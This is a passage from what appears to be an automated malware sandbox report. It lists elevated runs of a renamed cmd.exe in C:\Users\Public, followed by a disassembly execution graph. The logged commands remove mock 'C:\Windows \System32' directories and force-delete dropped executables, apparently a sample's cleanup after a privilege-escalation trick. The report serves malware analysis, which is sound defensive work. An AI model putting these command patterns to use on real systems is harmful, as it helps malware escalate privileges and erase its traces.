                            Wow64 process (32bit):false
                            Commandline:C:\\Users\\Public\\alpha /c rmdir "C:\Windows \System32"
                            Imagebase:0x7ff744f00000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:34
                            Start time:10:22:16
                            Start date:21/09/2024
                            Path:C:\Users\Public\alpha.exe
                            Wow64 process (32bit):false
                            Commandline:C:\\Users\\Public\\alpha /c rmdir "C:\Windows \"
                            Imagebase:0x7ff744f00000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:35
                            Start time:10:22:16
                            Start date:21/09/2024
                            Path:C:\Users\Public\alpha.exe
                            Wow64 process (32bit):false
                            Commandline:C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\per.exe" / A / F / Q / S
                            Imagebase:0x7ff744f00000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:36
                            Start time:10:22:17
                            Start date:21/09/2024
                            Path:C:\Users\Public\alpha.exe
                            Wow64 process (32bit):false
                            Commandline:C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\ger.exe" / A / F / Q / S
                            Imagebase:0x7ff744f00000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:37
                            Start time:10:22:17
                            Start date:21/09/2024
                            Path:C:\Users\Public\alpha.exe
                            Wow64 process (32bit):false
                            Commandline:C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S
                            Imagebase:0x7ff744f00000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:38
                            Start time:10:22:17
                            Start date:21/09/2024
                            Path:C:\Users\Public\alpha.exe
                            Wow64 process (32bit):false
                            Commandline:C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\Ping_c.mp4" / A / F / Q / S
                            Imagebase:0x7ff744f00000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:39
                            Start time:10:22:17
                            Start date:21/09/2024
                            Path:C:\Users\Public\alpha.exe
                            Wow64 process (32bit):false
                            Commandline:C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\xkn.exe" / A / F / Q / S
                            Imagebase:0x7ff744f00000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Disassembly

                            Reset < >

                              Execution Graph

                              Execution Coverage:4%
                              Dynamic/Decrypted Code Coverage:0%
                              Signature Coverage:36.4%
                              Total number of Nodes:872
                              Total number of Limit Nodes:7
                              execution_graph 18928 7ff744f06be0 18929 7ff744f0cd90 166 API calls 18928->18929 18930 7ff744f06c04 18929->18930 18931 7ff744f06c13 _pipe 18930->18931 18933 7ff744f241a2 18930->18933 18939 7ff744f06c32 18931->18939 18966 7ff744f06e26 18931->18966 18932 7ff744f03278 166 API calls 18932->18933 18934 7ff744f03278 166 API calls 18933->18934 18935 7ff744f241bc 18934->18935 18936 7ff744f2e91c 198 API calls 18935->18936 18937 7ff744f241c1 18936->18937 18941 7ff744f03278 166 API calls 18937->18941 18938 7ff744f06df1 18939->18938 18979 7ff744f0affc _dup 18939->18979 18943 7ff744f241d2 18941->18943 18942 7ff744f06c7d 18942->18933 18945 7ff744f0b038 _dup2 18942->18945 18944 7ff744f2e91c 198 API calls 18943->18944 18946 7ff744f241d7 18944->18946 18947 7ff744f06c93 18945->18947 18949 7ff744f03278 166 API calls 18946->18949 18947->18946 18948 7ff744f0d208 _close 18947->18948 18950 7ff744f06ca4 18948->18950 18951 7ff744f241e4 18949->18951 18981 7ff744f0be00 18950->18981 18952 7ff744f2e91c 198 API calls 18951->18952 18954 7ff744f241e9 18952->18954 18956 7ff744f06ccf _get_osfhandle DuplicateHandle 18957 7ff744f06d07 18956->18957 18958 7ff744f0b038 _dup2 18957->18958 18959 7ff744f06d11 18958->18959 18959->18946 18960 7ff744f0d208 _close 18959->18960 18961 7ff744f06d22 18960->18961 18962 7ff744f06e21 18961->18962 18964 7ff744f0affc _dup 18961->18964 18963 7ff744f2e91c 198 API calls 18962->18963 18963->18966 18965 7ff744f06d57 18964->18965 18965->18937 18967 7ff744f0b038 _dup2 18965->18967 18966->18932 18968 7ff744f06d6c 18967->18968 18968->18946 18969 7ff744f0d208 _close 18968->18969 18970 7ff744f06d7c 18969->18970 18971 7ff744f0be00 659 API calls 18970->18971 18972 7ff744f06d9c 18971->18972 18973 7ff744f0b038 _dup2 18972->18973 18974 7ff744f06da8 18973->18974 18974->18946 18975 7ff744f0d208 _close 18974->18975 18976 7ff744f06db9 18975->18976 18976->18962 18977 7ff744f06dc1 18976->18977 18977->18938 19018 7ff744f06e60 18977->19018 18980 7ff744f0b018 18979->18980 18980->18942 18982 7ff744f06cc4 18981->18982 18983 7ff744f0be1b 18981->18983 18982->18956 18982->18957 18983->18982 18984 7ff744f0be47 memset 18983->18984 18985 7ff744f0be67 18983->18985 19068 7ff744f0bff0 18984->19068 18987 7ff744f0be73 18985->18987 18988 7ff744f0bf29 18985->18988 18991 7ff744f0beaf 18985->18991 18989 7ff744f0be92 18987->18989 18994 7ff744f0bf0c 18987->18994 18990 7ff744f0cd90 166 API calls 18988->18990 18998 7ff744f0bea1 18989->18998 19022 7ff744f0c620 GetConsoleTitleW 18989->19022 18993 7ff744f0bf33 18990->18993 18991->18982 18996 7ff744f0bff0 185 API calls 18991->18996 18993->18991 18999 7ff744f0bf9e 18993->18999 19002 7ff744f088a8 _wcsicmp 18993->19002 19106 7ff744f0b0d8 memset 18994->19106 18996->18982 18998->18991 19005 7ff744f0af98 2 API calls 18998->19005 19247 7ff744f071ec 18999->19247 19000 7ff744f0bf1e 19000->18991 19004 7ff744f0bf5a 19002->19004 19003 7ff744f0bfa9 19003->18991 19007 7ff744f0cd90 166 API calls 19003->19007 19004->18999 19006 7ff744f0bf5f 19004->19006 19005->18991 19166 7ff744f10a6c 19006->19166 19009 7ff744f0bfbb 19007->19009 19009->18991 19011 7ff744f0bfc7 19009->19011 19013 7ff744f1081c 166 API calls 19011->19013 19012 7ff744f0bf75 19014 7ff744f0b0d8 194 API calls 19012->19014 19013->19012 19015 7ff744f0bf7f 19014->19015 19015->18991 19218 7ff744f15ad8 19015->19218 19020 7ff744f06e6d 19018->19020 19019 7ff744f06eb9 19019->18938 19020->19019 19021 7ff744f15cb4 7 API calls 19020->19021 19021->19020 19024 7ff744f0c675 19022->19024 19029 7ff744f0ca2f 19022->19029 19023 7ff744f1c5fc GetLastError 19023->19029 19025 7ff744f0ca40 17 API calls 19024->19025 19036 7ff744f0c69b 19025->19036 19026 7ff744f03278 166 API calls 19026->19029 19027 7ff744f1855c ??_V@YAXPEAX 19027->19029 19028 7ff744f1291c 8 API calls 19035 7ff744f0c94a 19028->19035 19029->19023 19029->19026 19029->19027 19030 7ff744f0c9b5 19032 7ff744f1855c ??_V@YAXPEAX 19030->19032 19031 7ff744f1855c ??_V@YAXPEAX 19059 7ff744f0c762 19031->19059 19034 7ff744f0c862 19032->19034 19033 7ff744f0c978 towupper 19033->19035 19040 7ff744f0c872 19034->19040 19043 7ff744f1c6b8 SetConsoleTitleW 19034->19043 19035->19023 19035->19028 19035->19029 19035->19030 19035->19033 19035->19035 19038 7ff744f2ec14 173 API calls 19035->19038 19057 7ff744f1c684 19035->19057 19035->19059 19062 7ff744f089c0 23 API calls 19035->19062 19064 7ff744f0ca16 GetLastError 19035->19064 19036->19029 19036->19030 19036->19035 19037 7ff744f0d3f0 223 API calls 19036->19037 19036->19059 19039 7ff744f0c741 19037->19039 19038->19059 19041 7ff744f0c74d 19039->19041 19045 7ff744f0c8b5 wcsncmp 19039->19045 19042 7ff744f1855c ??_V@YAXPEAX 19040->19042 19046 7ff744f0bd38 207 API calls 19041->19046 19041->19059 19044 7ff744f0c87c 19042->19044 19043->19040 19047 7ff744f18f80 7 API calls 19044->19047 19045->19041 19045->19059 19046->19059 19049 7ff744f0c88e 19047->19049 19048 7ff744f0c83d 19253 7ff744f0cb40 19048->19253 19049->18998 19051 7ff744f0c78a wcschr 19051->19059 19053 7ff744f0c855 19257 7ff744f07a70 19053->19257 19054 7ff744f0ca25 19056 7ff744f03278 166 API calls 19054->19056 19056->19029 19058 7ff744f03278 166 API calls 19057->19058 19060 7ff744f1c675 19058->19060 19059->19029 19059->19031 19059->19035 19059->19048 19059->19051 19059->19054 19061 7ff744f0ca2a 19059->19061 19060->19029 19063 7ff744f19158 7 API calls 19061->19063 19062->19035 19063->19029 19066 7ff744f03278 166 API calls 19064->19066 19066->19060 19069 7ff744f0c0c4 19068->19069 19070 7ff744f0c01c 19068->19070 19069->18985 19071 7ff744f0c022 19070->19071 19072 7ff744f0c086 19070->19072 19073 7ff744f0c030 19071->19073 19074 7ff744f0c113 19071->19074 19075 7ff744f0c144 19072->19075 19088 7ff744f0c094 19072->19088 19076 7ff744f0c039 wcschr 19073->19076 19086 7ff744f0c053 19073->19086 19081 7ff744f0ff70 2 API calls 19074->19081 19074->19086 19077 7ff744f0c151 19075->19077 19094 7ff744f0c1c8 19075->19094 19078 7ff744f0c301 19076->19078 19076->19086 19346 7ff744f0c460 19077->19346 19082 7ff744f0cd90 166 API calls 19078->19082 19079 7ff744f0c058 19090 7ff744f0ff70 2 API calls 19079->19090 19092 7ff744f0c073 19079->19092 19080 7ff744f0c0c6 19085 7ff744f0c0cf wcschr 19080->19085 19080->19092 19081->19086 19105 7ff744f0c30b 19082->19105 19084 7ff744f0c460 183 API calls 19084->19088 19089 7ff744f0c1be 19085->19089 19085->19092 19086->19079 19086->19080 19096 7ff744f0c211 19086->19096 19088->19069 19088->19084 19091 7ff744f0cd90 166 API calls 19089->19091 19090->19092 19091->19094 19092->19069 19093 7ff744f0c460 183 API calls 19092->19093 19093->19092 19094->19069 19094->19096 19097 7ff744f0c285 19094->19097 19101 7ff744f0d840 178 API calls 19094->19101 19095 7ff744f0c460 183 API calls 19095->19069 19099 7ff744f0ff70 2 API calls 19096->19099 19097->19096 19102 7ff744f0b6b0 170 API calls 19097->19102 19098 7ff744f0d840 178 API calls 19098->19105 19099->19069 19100 7ff744f0b6b0 170 API calls 19100->19086 19101->19094 19104 7ff744f0c2ac 19102->19104 19103 7ff744f0c3d4 19103->19092 19103->19096 19103->19100 19104->19092 19104->19096 19105->19069 19105->19096 19105->19098 19105->19103 19107 7ff744f0ca40 17 API calls 19106->19107 19123 7ff744f0b162 19107->19123 19108 7ff744f0b2e1 19109 7ff744f0b2f7 ??_V@YAXPEAX 19108->19109 19110 7ff744f0b303 19108->19110 19109->19110 19112 7ff744f18f80 7 API calls 19110->19112 19111 7ff744f0b1d9 19115 7ff744f0cd90 166 API calls 19111->19115 19131 7ff744f0b1ed 19111->19131 19114 7ff744f0b315 19112->19114 19113 7ff744f11ea0 8 API calls 19113->19123 19114->18989 19114->19000 19115->19131 19117 7ff744f1bfef _get_osfhandle SetFilePointer 19119 7ff744f1c01d 19117->19119 19117->19131 19118 7ff744f0b228 _get_osfhandle 19121 7ff744f0b23f _get_osfhandle 19118->19121 19118->19131 19122 7ff744f133f0 _vsnwprintf 19119->19122 19120 7ff744f0affc _dup 19120->19131 19121->19131 19125 7ff744f1c038 19122->19125 19123->19108 19123->19111 19123->19113 19123->19123 19124 7ff744f101b8 6 API calls 19124->19131 19130 7ff744f03278 166 API calls 19125->19130 19126 7ff744f1c1c3 19127 7ff744f133f0 _vsnwprintf 19126->19127 19127->19125 19128 7ff744f0d208 _close 19128->19131 19129 7ff744f126e0 19 API calls 19129->19131 19132 7ff744f1c1f9 19130->19132 19131->19108 19131->19117 19131->19118 19131->19120 19131->19124 19131->19126 19131->19128 19131->19129 19133 7ff744f1c060 19131->19133 19135 7ff744f0b038 _dup2 19131->19135 19136 7ff744f1c246 19131->19136 19137 7ff744f1c1a5 19131->19137 19142 7ff744f0b356 19131->19142 19360 7ff744f2f318 _get_osfhandle GetFileType 19131->19360 19134 7ff744f0af98 2 API calls 19132->19134 19133->19136 19140 7ff744f109f4 2 API calls 19133->19140 19134->19108 19135->19131 19138 7ff744f0af98 2 API calls 19136->19138 19139 7ff744f0b038 _dup2 19137->19139 19141 7ff744f1c24b 19138->19141 19143 7ff744f1c1b7 19139->19143 19144 7ff744f1c084 19140->19144 19145 7ff744f2f1d8 166 API calls 19141->19145 19150 7ff744f0af98 2 API calls 19142->19150 19146 7ff744f1c207 19143->19146 19147 7ff744f1c1be 19143->19147 19148 7ff744f0b900 166 API calls 19144->19148 19145->19108 19149 7ff744f0d208 _close 19146->19149 19151 7ff744f0d208 _close 19147->19151 19152 7ff744f1c08c 19148->19152 19149->19142 19154 7ff744f1c211 19150->19154 19151->19126 19153 7ff744f1c094 wcsrchr 19152->19153 19165 7ff744f1c0ad 19152->19165 19153->19165 19155 7ff744f133f0 _vsnwprintf 19154->19155 19156 7ff744f1c22c 19155->19156 19157 7ff744f03278 166 API calls 19156->19157 19157->19108 19158 7ff744f1c106 19159 7ff744f0ff70 2 API calls 19158->19159 19161 7ff744f1c13b 19159->19161 19160 7ff744f1c0e0 _wcsnicmp 19160->19165 19161->19136 19162 7ff744f1c146 SearchPathW 19161->19162 19162->19136 19163 7ff744f1c188 19162->19163 19164 7ff744f126e0 19 API calls 19163->19164 19164->19137 19165->19158 19165->19160 19167 7ff744f11ea0 8 API calls 19166->19167 19168 7ff744f10ab9 19167->19168 19169 7ff744f10b12 memset 19168->19169 19170 7ff744f1d927 19168->19170 19171 7ff744f10aee _wcsnicmp 19168->19171 19173 7ff744f1128f ??_V@YAXPEAX 19168->19173 19172 7ff744f0ca40 17 API calls 19169->19172 19175 7ff744f1081c 166 API calls 19170->19175 19171->19169 19171->19170 19174 7ff744f10b5a 19172->19174 19177 7ff744f0b364 17 API calls 19174->19177 19188 7ff744f1d94e 19174->19188 19176 7ff744f1d933 19175->19176 19176->19169 19176->19173 19178 7ff744f10b6f 19177->19178 19178->19173 19180 7ff744f10b8c wcschr 19178->19180 19184 7ff744f10c0f wcsrchr 19178->19184 19178->19188 19191 7ff744f0cd90 166 API calls 19178->19191 19192 7ff744f13060 171 API calls 19178->19192 19193 7ff744f1081c 166 API calls 19178->19193 19194 7ff744f0d3f0 223 API calls 19178->19194 19195 7ff744f11ea0 8 API calls 19178->19195 19196 7ff744f0af74 170 API calls 19178->19196 19197 7ff744f10d71 wcsrchr 19178->19197 19199 7ff744f1291c 8 API calls 19178->19199 19200 7ff744f10fb1 wcsrchr 19178->19200 19201 7ff744f10fd0 wcschr 19178->19201 19202 7ff744f12eb4 22 API calls 19178->19202 19205 7ff744f110fd wcsrchr 19178->19205 19214 7ff744f11087 _wcsicmp 19178->19214 19217 7ff744f1da74 19178->19217 19361 7ff744f13bac 19178->19361 19365 7ff744f12efc 19178->19365 19179 7ff744f1d96b ??_V@YAXPEAX 19179->19188 19180->19178 19183 7ff744f1d99a wcschr 19183->19188 19184->19178 19184->19188 19185 7ff744f1d9ca GetFileAttributesW 19186 7ff744f1da64 19185->19186 19185->19188 19187 7ff744f1da90 GetFileAttributesW 19187->19188 19189 7ff744f1daa8 GetLastError 19187->19189 19188->19179 19188->19183 19188->19185 19188->19186 19190 7ff744f1d9fd ??_V@YAXPEAX 19188->19190 19189->19186 19189->19188 19190->19188 19191->19178 19192->19178 19193->19178 19194->19178 19195->19178 19196->19178 19197->19178 19198 7ff744f10d97 NeedCurrentDirectoryForExePathW 19197->19198 19198->19178 19198->19188 19199->19178 19200->19178 19200->19201 19201->19186 19203 7ff744f10fed wcschr 19201->19203 19202->19178 19203->19178 19203->19186 19205->19178 19206 7ff744f1111a _wcsicmp 19205->19206 19207 7ff744f11138 _wcsicmp 19206->19207 19208 7ff744f1123d 19206->19208 19207->19208 19209 7ff744f110c5 19207->19209 19210 7ff744f11175 19208->19210 19211 7ff744f11250 ??_V@YAXPEAX 19208->19211 19209->19210 19212 7ff744f11169 ??_V@YAXPEAX 19209->19212 19213 7ff744f18f80 7 API calls 19210->19213 19211->19210 19212->19210 19215 7ff744f0bf70 19213->19215 19216 7ff744f110a7 _wcsicmp 19214->19216 19214->19217 19215->18999 19215->19012 19216->19209 19216->19217 19217->19186 19217->19187 19219 7ff744f0cd90 166 API calls 19218->19219 19220 7ff744f15b12 19219->19220 19221 7ff744f0cb40 166 API calls 19220->19221 19246 7ff744f15b8b 19220->19246 19223 7ff744f15b26 19221->19223 19222 7ff744f18f80 7 API calls 19224 7ff744f0bf99 19222->19224 19225 7ff744f10a6c 273 API calls 19223->19225 19223->19246 19224->18998 19226 7ff744f15b43 19225->19226 19227 7ff744f15bb8 19226->19227 19228 7ff744f15b48 GetConsoleTitleW 19226->19228 19230 7ff744f15bbd GetConsoleTitleW 19227->19230 19231 7ff744f15bf4 19227->19231 19229 7ff744f0cad4 172 API calls 19228->19229 19232 7ff744f15b66 19229->19232 19235 7ff744f0cad4 172 API calls 19230->19235 19233 7ff744f15bfd 19231->19233 19234 7ff744f1f452 19231->19234 19379 7ff744f14224 InitializeProcThreadAttributeList 19232->19379 19240 7ff744f15c1b 19233->19240 19241 7ff744f1f462 19233->19241 19233->19246 19237 7ff744f13c24 166 API calls 19234->19237 19238 7ff744f15bdb 19235->19238 19237->19246 19440 7ff744f096e8 19238->19440 19243 7ff744f03278 166 API calls 19240->19243 19244 7ff744f03278 166 API calls 19241->19244 19243->19246 19244->19246 19246->19222 19249 7ff744f07211 _setjmp 19247->19249 19252 7ff744f07279 19247->19252 19250 7ff744f07265 19249->19250 19249->19252 19776 7ff744f072b0 19250->19776 19252->19003 19254 7ff744f0cb63 19253->19254 19255 7ff744f0cd90 166 API calls 19254->19255 19256 7ff744f0c848 19255->19256 19256->19053 19260 7ff744f0cad4 19256->19260 19272 7ff744f07d30 memset 19257->19272 19259 7ff744f07a8a 19259->19034 19261 7ff744f0cad9 19260->19261 19262 7ff744f0cb05 19260->19262 19261->19262 19263 7ff744f0cd90 166 API calls 19261->19263 19262->19053 19264 7ff744f1c722 19263->19264 19264->19262 19265 7ff744f1c72e GetConsoleTitleW 19264->19265 19265->19262 19266 7ff744f1c74a 19265->19266 19267 7ff744f0b6b0 170 API calls 19266->19267 19271 7ff744f1c778 19267->19271 19268 7ff744f1c7ec 19269 7ff744f0ff70 2 API calls 19268->19269 19269->19262 19270 7ff744f1c7dd SetConsoleTitleW 19270->19268 19271->19268 19271->19270 19273 7ff744f0ca40 17 API calls 19272->19273 19274 7ff744f07dc3 19273->19274 19275 7ff744f1417c 166 API calls 19274->19275 19287 7ff744f1af72 19274->19287 19276 7ff744f07dee 19275->19276 19278 7ff744f0d3f0 223 API calls 19276->19278 19277 7ff744f03278 166 API calls 19279 7ff744f1af91 19277->19279 19280 7ff744f07dfb 19278->19280 19279->19259 19281 7ff744f1af7e 19280->19281 19282 7ff744f07e09 19280->19282 19283 7ff744f1af89 19281->19283 19281->19287 19282->19279 19285 7ff744f11ea0 8 API calls 19282->19285 19286 7ff744f0b900 166 API calls 19282->19286 19282->19287 19291 7ff744f07ea4 19282->19291 19295 7ff744f1b024 19282->19295 19305 7ff744f07ef1 19282->19305 19308 7ff744f07aa0 19282->19308 19284 7ff744f11ea0 8 API calls 19283->19284 19284->19279 19285->19282 19286->19282 19287->19277 19288 7ff744f1823c 10 API calls 19288->19305 19289 7ff744f1afae 19292 7ff744f1b03f 19289->19292 19300 7ff744f1afce 19289->19300 19290 7ff744f08b20 231 API calls 19290->19305 19293 7ff744f07ec3 19291->19293 19294 7ff744f07eb7 ??_V@YAXPEAX 19291->19294 19292->19287 19297 7ff744f18f80 7 API calls 19293->19297 19294->19293 19298 7ff744f03278 166 API calls 19295->19298 19296 7ff744f0b364 17 API calls 19296->19305 19299 7ff744f07ed5 19297->19299 19298->19279 19299->19259 19300->19279 19301 7ff744f1aff6 19300->19301 19302 7ff744f03278 166 API calls 19300->19302 19301->19279 19302->19301 19303 7ff744f08940 17 API calls 19303->19305 19304 7ff744f18a70 2 API calls 19304->19305 19305->19279 19305->19282 19305->19288 19305->19289 19305->19290 19305->19292 19305->19296 19305->19303 19305->19304 19306 7ff744f13a0c 2 API calls 19305->19306 19306->19305 19309 7ff744f07aeb memset 19308->19309 19310 7ff744f07adb 19308->19310 19312 7ff744f0ca40 17 API calls 19309->19312 19343 7ff744f1291c GetDriveTypeW 19310->19343 19314 7ff744f07b36 19312->19314 19316 7ff744f07b3e GetFullPathNameW 19314->19316 19332 7ff744f1ae4e 19314->19332 19315 7ff744f1ae3a 19317 7ff744f03278 166 API calls 19315->19317 19318 7ff744f07b73 19316->19318 19319 7ff744f1ae55 GetLastError 19316->19319 19320 7ff744f1ae44 19317->19320 19321 7ff744f1ae68 19318->19321 19322 7ff744f07b7e CreateDirectoryW 19318->19322 19319->19332 19324 7ff744f07bb5 19320->19324 19329 7ff744f03278 166 API calls 19321->19329 19325 7ff744f07b93 19322->19325 19326 7ff744f07bdf GetLastError 19322->19326 19323 7ff744f03278 166 API calls 19328 7ff744f1af6b 19323->19328 19327 7ff744f18f80 7 API calls 19324->19327 19325->19324 19330 7ff744f07ba9 free 19325->19330 19326->19321 19333 7ff744f07bf8 19326->19333 19331 7ff744f07bc6 19327->19331 19341 7ff744f1ae7e 19329->19341 19330->19324 19331->19282 19332->19323 19333->19332 19334 7ff744f07cd1 CreateDirectoryW 19333->19334 19337 7ff744f07c8f 19333->19337 19338 7ff744f07c52 CreateDirectoryW 19333->19338 19340 7ff744f07cca 19333->19340 19333->19341 19334->19325 19335 7ff744f07cf3 19334->19335 19336 7ff744f1af46 GetLastError 19335->19336 19336->19325 19336->19332 19337->19333 19337->19338 19338->19337 19339 7ff744f07c7b GetLastError 19338->19339 19339->19332 19339->19337 19340->19334 19341->19332 19341->19334 19342 7ff744f1af3d 19341->19342 19342->19336 19344 7ff744f18f80 7 API calls 19343->19344 19345 7ff744f07ae3 19344->19345 19345->19309 19345->19315 19347 7ff744f0c4c9 19346->19347 19348 7ff744f0c486 19346->19348 19351 7ff744f0ff70 2 API calls 19347->19351 19353 7ff744f0c161 19347->19353 19349 7ff744f0c48e wcschr 19348->19349 19348->19353 19350 7ff744f0c4ef 19349->19350 19349->19353 19352 7ff744f0cd90 166 API calls 19350->19352 19351->19353 19359 7ff744f0c4f9 19352->19359 19353->19069 19353->19095 19354 7ff744f0c5bd 19355 7ff744f0c541 19354->19355 19358 7ff744f0b6b0 170 API calls 19354->19358 19355->19353 19357 7ff744f0ff70 2 API calls 19355->19357 19356 7ff744f0d840 178 API calls 19356->19359 19357->19353 19358->19355 19359->19353 19359->19354 19359->19355 19359->19356 19360->19131 19362 7ff744f13bfe 19361->19362 19364 7ff744f13bcf 19361->19364 19362->19178 19363 7ff744f13bdc wcschr 19363->19362 19363->19364 19364->19362 19364->19363 19366 7ff744f12f97 19365->19366 19367 7ff744f12f2a 19365->19367 19366->19367 19368 7ff744f12f9c wcschr 19366->19368 19369 7ff744f1823c 10 API calls 19367->19369 19371 7ff744f12f5a 19368->19371 19372 7ff744f12fb6 wcschr 19368->19372 19370 7ff744f12f56 19369->19370 19370->19371 19373 7ff744f13a0c 2 API calls 19370->19373 19374 7ff744f18f80 7 API calls 19371->19374 19378 7ff744f1e4ec 19371->19378 19372->19367 19372->19371 19375 7ff744f12fe0 19373->19375 19376 7ff744f12f83 19374->19376 19375->19371 19377 7ff744f12fe9 wcsrchr 19375->19377 19376->19178 19377->19371 19380 7ff744f142ab UpdateProcThreadAttribute 19379->19380 19381 7ff744f1ecd4 GetLastError 19379->19381 19383 7ff744f142eb memset memset GetStartupInfoW 19380->19383 19384 7ff744f1ecf0 GetLastError 19380->19384 19382 7ff744f1ecee 19381->19382 19386 7ff744f13a90 170 API calls 19383->19386 19477 7ff744f29eec 19384->19477 19387 7ff744f143a8 19386->19387 19389 7ff744f0b900 166 API calls 19387->19389 19390 7ff744f143bb 19389->19390 19391 7ff744f14638 _local_unwind 19390->19391 19392 7ff744f143cc 19390->19392 19391->19392 19393 7ff744f143de wcsrchr 19392->19393 19394 7ff744f14415 19392->19394 19393->19394 19395 7ff744f143f7 lstrcmpW 19393->19395 19464 7ff744f15a68 _get_osfhandle SetConsoleMode _get_osfhandle SetConsoleMode 19394->19464 19395->19394 19397 7ff744f14668 19395->19397 19465 7ff744f29044 19397->19465 19436 7ff744f15c3c 19437 7ff744f15c4e 19436->19437 19438 7ff744f15c45 19436->19438 19437->19246 19438->19437 19439 7ff744f1f470 SetConsoleTitleW 19438->19439 19439->19437 19457 7ff744f09737 19440->19457 19442 7ff744f0977d memset 19444 7ff744f0ca40 17 API calls 19442->19444 19443 7ff744f0cd90 166 API calls 19443->19457 19444->19457 19445 7ff744f1b76e 19447 7ff744f03278 166 API calls 19445->19447 19446 7ff744f1b7b3 19450 7ff744f1b787 19447->19450 19448 7ff744f1b79a 19449 7ff744f1855c ??_V@YAXPEAX 19448->19449 19449->19446 19452 7ff744f1b795 19450->19452 19567 7ff744f2e944 19450->19567 19451 7ff744f0b364 17 API calls 19451->19457 19575 7ff744f27694 19452->19575 19457->19442 19457->19443 19457->19445 19457->19446 19457->19448 19457->19451 19459 7ff744f0986d 19457->19459 19479 7ff744f11fac memset 19457->19479 19506 7ff744f0ce10 19457->19506 19556 7ff744f096b4 19457->19556 19561 7ff744f15920 19457->19561 19460 7ff744f0988c 19459->19460 19461 7ff744f09880 ??_V@YAXPEAX 19459->19461 19462 7ff744f18f80 7 API calls 19460->19462 19461->19460 19463 7ff744f0989d 19462->19463 19463->19436 19466 7ff744f13a90 170 API calls 19465->19466 19467 7ff744f29064 19466->19467 19468 7ff744f2906e 19467->19468 19471 7ff744f29083 19467->19471 19469 7ff744f1498c 8 API calls 19468->19469 19470 7ff744f29081 19469->19470 19470->19394 19472 7ff744f0cd90 166 API calls 19471->19472 19473 7ff744f2909b 19472->19473 19473->19470 19474 7ff744f1498c 8 API calls 19473->19474 19475 7ff744f290ec 19474->19475 19476 7ff744f0ff70 2 API calls 19475->19476 19476->19470 19478 7ff744f1ed0a DeleteProcThreadAttributeList 19477->19478 19478->19382 19480 7ff744f1203b 19479->19480 19481 7ff744f120b0 19480->19481 19482 7ff744f12094 19480->19482 19483 7ff744f13060 171 API calls 19481->19483 19485 7ff744f1211c 19481->19485 19484 7ff744f120a6 19482->19484 19486 7ff744f03278 166 API calls 19482->19486 19483->19485 19488 7ff744f18f80 7 API calls 19484->19488 19485->19484 19487 7ff744f12e44 2 API calls 19485->19487 19486->19484 19490 7ff744f12148 19487->19490 19489 7ff744f12325 19488->19489 19489->19457 19490->19484 19581 7ff744f12d70 19490->19581 19493 7ff744f0b900 166 API calls 19495 7ff744f121d0 19493->19495 19494 7ff744f1e04a ??_V@YAXPEAX 19494->19484 19495->19494 19496 7ff744f1221c wcsspn 19495->19496 19505 7ff744f122a4 ??_V@YAXPEAX 19495->19505 19498 7ff744f0b900 166 API calls 19496->19498 19499 7ff744f1223b 19498->19499 19499->19494 19503 7ff744f12252 19499->19503 19500 7ff744f1228f 19501 7ff744f0d3f0 223 API calls 19500->19501 19501->19505 19502 7ff744f1e06d wcschr 19502->19503 19503->19500 19503->19502 19504 7ff744f1e090 towupper 19503->19504 19504->19500 19504->19503 19505->19484 19507 7ff744f0d0f8 19506->19507 19537 7ff744f0ce5b 19506->19537 19509 7ff744f18f80 7 API calls 19507->19509 19508 7ff744f1c860 19510 7ff744f1c97c 19508->19510 19624 7ff744f2ee88 19508->19624 19511 7ff744f0d10a 19509->19511 19514 7ff744f2e9b4 197 API calls 19510->19514 19511->19457 19516 7ff744f1c981 longjmp 19514->19516 19519 7ff744f1c99a 19516->19519 19517 7ff744f1c95c 19517->19510 19522 7ff744f096b4 186 API calls 19517->19522 19518 7ff744f1c882 EnterCriticalSection LeaveCriticalSection 19524 7ff744f0d0e3 19518->19524 19519->19507 19521 7ff744f1c9b3 ??_V@YAXPEAX 19519->19521 19521->19507 19522->19517 19524->19457 19525 7ff744f0cd90 166 API calls 19525->19537 19526 7ff744f0d208 _close 19526->19537 19527 7ff744f1c9d5 19528 7ff744f2d610 167 API calls 19527->19528 19530 7ff744f1c9da 19528->19530 19529 7ff744f0b900 166 API calls 19529->19537 19531 7ff744f1ca07 19530->19531 19533 7ff744f2bfec 176 API calls 19530->19533 19532 7ff744f2e91c 198 API calls 19531->19532 19538 7ff744f1ca0c 19532->19538 19534 7ff744f1c9f1 19533->19534 19536 7ff744f03240 166 API calls 19534->19536 19535 7ff744f0cf33 memset 19535->19537 19536->19531 19537->19507 19537->19508 19537->19519 19537->19524 19537->19525 19537->19527 19537->19529 19537->19535 19539 7ff744f0ca40 17 API calls 19537->19539 19540 7ff744f2bfec 176 API calls 19537->19540 19541 7ff744f0d184 wcschr 19537->19541 19542 7ff744f1c9c9 19537->19542 19543 7ff744f0d1a7 wcschr 19537->19543 19546 7ff744f10a6c 273 API calls 19537->19546 19547 7ff744f0be00 647 API calls 